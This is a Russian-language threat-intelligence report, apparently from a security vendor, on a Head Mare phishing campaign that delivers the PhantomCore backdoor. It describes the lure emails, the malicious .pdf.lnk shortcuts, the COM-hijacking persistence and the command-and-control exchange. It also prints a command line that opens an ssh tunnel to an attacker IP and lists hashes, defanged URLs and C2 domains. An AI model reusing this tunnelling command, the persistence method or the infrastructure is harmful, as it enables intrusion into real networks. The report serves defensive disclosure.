Описание вредоносного ПО

Новая рассылка Head Mare: договор с фантомом

В феврале 2026 года хактивистская группировка Head Mare продолжает привлекать к себе внимание киберсообщества. Не успели мы рассказать о кампании с использованием PhantomHeart, как обнаружили еще одну масштабную фишинговую рассылку, на этот раз с новой версией бэкдора PhantomCore (PhantomDL). Получателям приходят письма от имени научно-исследовательской организации с предложением о заключении договора. Во вложениях находятся зашифрованные архивы, а в качестве пароля используется текущий год. В архиве — несколько файлов‑ярлыков (.lnk), которые автоматически запускают процесс загрузки и установки бэкдора.

В этой статье мы разберем технические детали атаки, оценим потенциальный масштаб угрозы и обсудим рекомендации по защите от подобных кампаний.

Вредоносная рассылка

Письмо написано от имени «ведущего специалиста договорного отдела» научно-исследовательской организации и выглядит как предложение подписать договор на выполнение неких работ. Отправитель предлагает скачать архив с документами, имеющими какое-то отношение к этому договору. Архив запаролен, пароль указан в теле письма — текущий год. Получателя просят сообщить, когда будет удобно заключить договор. В подписи указаны подробные контактные данные «ведущего специалиста»: фамилия, имя и отчество, должность, номер телефона с добавочным, корпоративный e‑mail и адрес сайта. Все оформлено так, чтобы создать ощущение делового общения и подтолкнуть получателя открыть вложение.

Содержимое фишингового письма

Содержимое фишингового письма

В архиве находится несколько ярлыков с двойным расширением .pdf.lnk, которые маскируются под проект договора, техническое задание и другие релевантные для заданной в письме темы документы.

Содержимое архива «Комплект Документов.rar»

При запуске любого из ярлыков на машине выполнится команда для загрузки промежуточного скрипта, расположенного на сервере злоумышленников.

Команда из ярлыка «Карточка предприятия [REDACTED] (общий счет).pdf.lnk»

По адресу, к которому обращается команда (в примере это hxxps://1cbit-dev[.]com/devices/firmware/beta/update.html), можно обнаружить скрипт для загрузки и установки бэкдора. Дополнительно этот скрипт скачивает и открывает документ-приманку.

Скрипт для загрузки бэкдора

Скрипт для загрузки бэкдора

Стоит отметить, что ярлыки работают схожим образом. Единственное отличие между ними — это ссылки, по которым будут загружаться бэкдоры и документы. За каждым ярлыком закреплен документ, соответствующий его названию, при этом бэкдор всегда скачивается один и тот же.

Документы-приманки, открываемые ярлыками из архива

Документы-приманки, открываемые ярлыками из архива

Промежуточный скрипт написан на PowerShell. Он скачивает с удаленного сервера файл USOCachedData.txt (MD5: 6EA2912050632ACD186CE790634B6D44), обеспечивает закрепление в системе и автозапуск. Для закрепления используется техника PSFactoryBuffer COM Hijacking — подмена в реестре пути к одной из системных библиотек, которые используются при создании COM-объектов. В результате всякий раз, когда стороннее приложение обращается к соответствующему COM-объекту, запускается вредоносный файл.

Файл USOCachedData.txt, хоть и имеет расширение .txt, на самом деле является исполняемой библиотекой — новым вариантом PhantomCore. Основная задача этого бэкдора — предоставление злоумышленникам удаленной командной строки в зараженной системе.

Образец, который распространяется в рамках описанной кампании, написан на C++, а строки в нем зашифрованы побайтовым XOR с уникальными ключами для каждой строки. После запуска бэкдор отправляет на C2-сервер два POST-запроса, содержащие данные в формате JSON, — для регистрации нового бота и получения команд. По сравнению с прошлыми версиями пути, по которым PhantomCore связывается с C2, незначительно изменились. Изменились и названия и содержимое полей в отправляемом на С2 JSON.

Коммуникация PhantomCore с C2

Коммуникация PhantomCore с C2

В запросе на регистрацию PhantomCore передает закодированные в base64 данные о боте и зараженной системе. Декодированная строка с данными выглядит следующим образом:

Во втором запросе бэкдор отправляет только идентификатор бота. В ответ злоумышленники передают следующую последовательность команд, которую бэкдор пытается выполнить в зараженной системе.

  • Скачивание архива с вредоносным ПО для создания туннеля. Внутри архива находится файл TemplateMaintenanceHost.exe.
  • Распаковка содержимого архива в директорию AppData.
  • Проверка успешной распаковки.
  • Закрепление в системе с помощью задачи планировщика.
  • Запуск задачи, созданной предыдущей командой.

Файл TemplateMaintenanceHost.exe — это модуль для запуска ssh.exe, написанный на Golang. Файл ssh.exe присутствует в последних версиях ОС Windows по умолчанию. TemplateMaintenanceHost.exe запускает его с переданными в командной строке параметрами либо с параметрами по умолчанию, если злоумышленники не задали ничего конкретного. Так, если командная строка выглядит как TemplateMaintenanceHost.exe -i 31.59.104.239 -p 45631 -u sadjio8sdjajdssdw, процесс ssh.exe будет запущен со следующими параметрами:

А при запуске командой TemplateMaintenanceHost.exe  -i 195.58.54.238  будут использованы параметры по умолчанию:

Запуск ssh.exe с таким набором аргументов приводит к созданию туннеля с удаленным хостом. При этом сам процесс ssh.exe выступает в роли SOCKS5-прокси и способен перенаправлять трафик от удаленного сервера в локальную сеть через зараженную машину, давая атакующим возможность подключаться к другим рабочим станциям и серверам.

Жертвы

Новая рассылка Head Mare затронула несколько сотен пользователей из российских организаций. Среди целей были как организации из государственного сектора, так и компании из логистической, финансовой и промышленной отраслей.

Индикаторы компрометации

Архивы
0b7262cbdab759e711b2d0ebe81b3cbb
2a7e7b5d95fd63bce42ae1e6aa9f8fbf
a9688994151ad2d732b7d8743c48d779

Ярлыки
1bc7a6056d5b35a938d67e3bf81da5e8 — техническое задание.pdf.lnk
2bf231028463eca661b0fd78184020fd — проект договора на выполнение работ.pdf.lnk
ae9e60196f7c873d346db1a884bb8f21 — карточка предприятия [REDACTED] (общий счет).pdf.lnk
1473be0903d1342b79dc066c0264a1b8 — техническое задание.pdf.lnk
b14cd85092e7b6a58db8822708fc158f — проект договора на выполнение работ.pdf.lnk
c58df00cd9caac4798dd89703a46c3b8 — карточка предприятия [REDACTED] (общий счет).pdf.lnk
025756c52670841936e15ec17df56f04 — техническое задание.pdf.lnk
7a51be2d79c63e5a372bdee6adc1b8f3 — проект договора на выполнение работ.pdf.lnk
c6cf2307caefd444b77d02555226779f — карточка предприятия [REDACTED] (общий счет).pdf.lnk
6def6f248bf5f204c402191aaead05e4 — проект договора на выполнение работ.pdf.lnk
8a4f149fc61148be9e10edd19f8eb05b — техническое задание.pdf.lnk
96f6cf42eb88cf861bb2ada14db68924 — карточка предприятия [REDACTED] (общий счет).pdf.lnk

URL-адреса
hxxps://1cbit-dev[.]com/controllers/interface/kappa/package.html
hxxps://1cbit-dev[.]com/controllers/interface/kappa/files.html
hxxps://1cbit-dev[.]com/controllers/interface/kappa/downloads.html
hxxps://1cbit-dev[.]com/clusters/network/omega/files.html
hxxps://1cbit-dev[.]com/clusters/network/omega/connect.html
hxxps://1cbit-dev[.]com/clusters/network/omega/access.html
hxxps://1cbit-dev[.]com/devices/firmware/beta/patch.html
hxxps://1cbit-dev[.]com/devices/firmware/beta/upgrade.html
hxxps://1cbit-dev[.]com/devices/firmware/beta/update.html
hxxps://1cbit-dev[.]com/hardware/archive/alpha/package.html
hxxps://1cbit-dev[.]com/hardware/archive/alpha/files.html
hxxps://1cbit-dev[.]com/hardware/archive/alpha/get.html
hxxps://defendcore[.]online/download/1.zip

PhantomCore MD5
6EA2912050632ACD186CE790634B6D44
456AE6D4C3FCED28BB40389473C148DE
03573CC2710D3A1B891F638C4113168B
F4DBE5F1C7E872DB6F1258E8C2C4DBBF
052FD127AF44991E536608C54B1B8442
0B4A9E34C5455A627EA460538143A05F
250E9003EDBB5EB20FE02A3FBDD173EE
2F8DCAA6A262D69AA83E54E2A0634B55
56E574FF9E3D417AF55FE867AFCEFA79
ABAA834680F12B1B17D113E039001E1D
D24329DD3AD1876FFEC84FD169245343
D458F12D551F8C600D132056C6549C68

PhantomCore C2
cosmetic-shop[.]online
moscow-media[.]online
cheap-market[.]online
cheap-zone[.]online

Модуль для запуска SSH на Golang
FDF5DC59B2947FF7DA9D86DA40B49248

Новая рассылка Head Mare: договор с фантомом

Ваш e-mail не будет опубликован. Обязательные поля помечены *

 

Отчеты

Продолжение операции «Форумный тролль»: российских политологов атакуют при помощи отчетов о плагиате

Эксперты GReAT «Лаборатории Касперского» обнаружили новую волну кибератак APT-группы «Форумный тролль», нацеленную на российских ученых-политологов, доставляющую на устройства фреймворк Tuoni.